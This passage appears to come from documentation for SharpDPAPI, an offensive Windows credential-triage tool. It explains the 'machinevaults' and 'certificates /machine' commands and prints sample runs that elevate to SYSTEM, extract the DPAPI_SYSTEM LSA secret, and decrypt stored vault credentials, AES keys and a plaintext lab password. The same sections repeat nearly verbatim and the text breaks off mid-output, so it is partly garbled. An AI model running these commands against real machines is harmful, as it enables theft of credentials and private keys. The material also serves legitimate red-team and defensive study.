LastWritten : 3/24/2019 7:08:43 PM
TargetName : Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}
TargetAlias :
Comment :
UserName : TESTLAB\harmj0y
Credential : Password123!
Folder : C:\WINDOWS\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials
CredFile : DFBE70A7E5CC19A398EBF1B96859CE5D
...(snip)...
machinevaults
The machinevaults command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine Vaults. Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret). C:\Temp>SharpDPAPI.exe machinevaults
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Vault Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
[*] Triaging SYSTEM Vaults
[*] Triaging Vault folder: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b38 0-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {0bd732d9-c396-4f9a-a69a-508632c05235}
size : 324
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782/26128
description :
aes128 key : 74CE3D7BCC4D0C4734931041F6D00D09
aes256 key : B497F57730A2F29C3533B76BD6B33EEA231C1F51ED933E0CA1210B9E3A16D081
...(snip)...
certificates /machine
The certificates /machine command will use the machine certificate store to look for decryptable machine certificate private keys. /mkfile:X and {GUID}:masterkey are usable with the /target:\[file|folder\] command, otherwise SharpDPAPI will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine system encrypted DPAPI private certificate keys. By default, only private keys linkable to an associated installed certificate are displayed. The /showall command will display ALL decrypted private keys. Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret). C:\Temp>SharpDPAPI.exe certificates /machine
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{f12f57e1-dd41-4daa-88f1-37a64034c7e9}:3AEB121ECF2...(snip)...
[*] Triaging System Certificates
Folder : C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys
File : 9377cea385fa1e5bf7815ee2024d0eea_6c712ef3-1467-4f96-bb5c-6737ba66cfb0
CredFile : C73A55F92FAE222C18A8989FEA28A1FE
guid MasterKey : {1cb83cb5-96cd-445d-baac-49e97f4eeb72}
size : 544
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782/26128
description : Local Credential Data
LastWritten : 3/24/2019 7:08:43 PM
TargetName : Domain:batch=TaskScheduler:Task:{B745BF75-D62D-4B1C-84ED-F0437214ECED}
TargetAlias :
Comment :
UserName : TESTLAB\harmj0y
Credential : Password123!
Folder : C:\WINDOWS\ServiceProfiles\LocalService\AppData\Local\Microsoft\Credentials
CredFile : DFBE70A7E5CC19A398EBF1B96859CE5D
...(snip)...
machinevaults
The machinevaults command will elevated to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine Vaults. Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret). C:\Temp>SharpDPAPI.exe machinevaults
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.2.0
[*] Action: Machine DPAPI Vault Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{1e76e1ee-1c53-4350-9a3d-7dec7afd024a}:4E4193B4C4D2F0420E0656B5F83D03754B565A0C
...(snip)...
[*] Triaging SYSTEM Vaults
[*] Triaging Vault folder: C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
VaultID : 4bf4c442-9b8a-41a0-b38 0-dd4a704ddb28
Name : Web Credentials
guidMasterKey : {0bd732d9-c396-4f9a-a69a-508632c05235}
size : 324
flags : 0x20000000 (CRYPTPROTECT_SYSTEM)
algHash/algCrypt : 32782/26128
description :
aes128 key : 74CE3D7BCC4D0C4734931041F6D00D09
aes256 key : B497F57730A2F29C3533B76BD6B33EEA231C1F51ED933E0CA1210B9E3A16D081
...(snip)...
certificates /machine
The certificates /machine command will use the machine certificate store to look for decryptable machine certificate private keys. /mkfile:X and {GUID}:masterkey are usable with the /target:\[file|folder\] command, otherwise SharpDPAPI will elevate to SYSTEM to retrieve the DPAPI_SYSTEM LSA secret which is then used to decrypt any found machine DPAPI masterkeys. These keys are then used to decrypt any found machine system encrypted DPAPI private certificate keys. By default, only private keys linkable to an associated installed certificate are displayed. The /showall command will display ALL decrypted private keys. Local administrative rights are needed (so we can retrieve the DPAPI_SYSTEM LSA secret). C:\Temp>SharpDPAPI.exe certificates /machine
__ _ _ _ ___
(_ |_ _. ._ ._ | \ |_) /\ |_) |
__) | | (_| | |_) |_/ | /--\ | _|_
|
v1.10.0
[*] Action: Certificate Triage
[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()
[*] Secret : DPAPI_SYSTEM
[*] full: DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] m/u : DBA60EB802B6C4B42E1E450BB5781EBD0846E1BF / 6C88CEFD23D0291FA9FE46899D4DE12A180E76C3
[*] SYSTEM master key cache:
{f12f57e1-dd41-4daa-88f1-37a64034c7e9}:3AEB121ECF2...(snip)...
[*] Triaging System Certificates
Folder : C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys
File : 9377cea385fa1e5bf7815ee2024d0eea_6c712ef3-1467-4f96-bb5c-6737ba66cfb0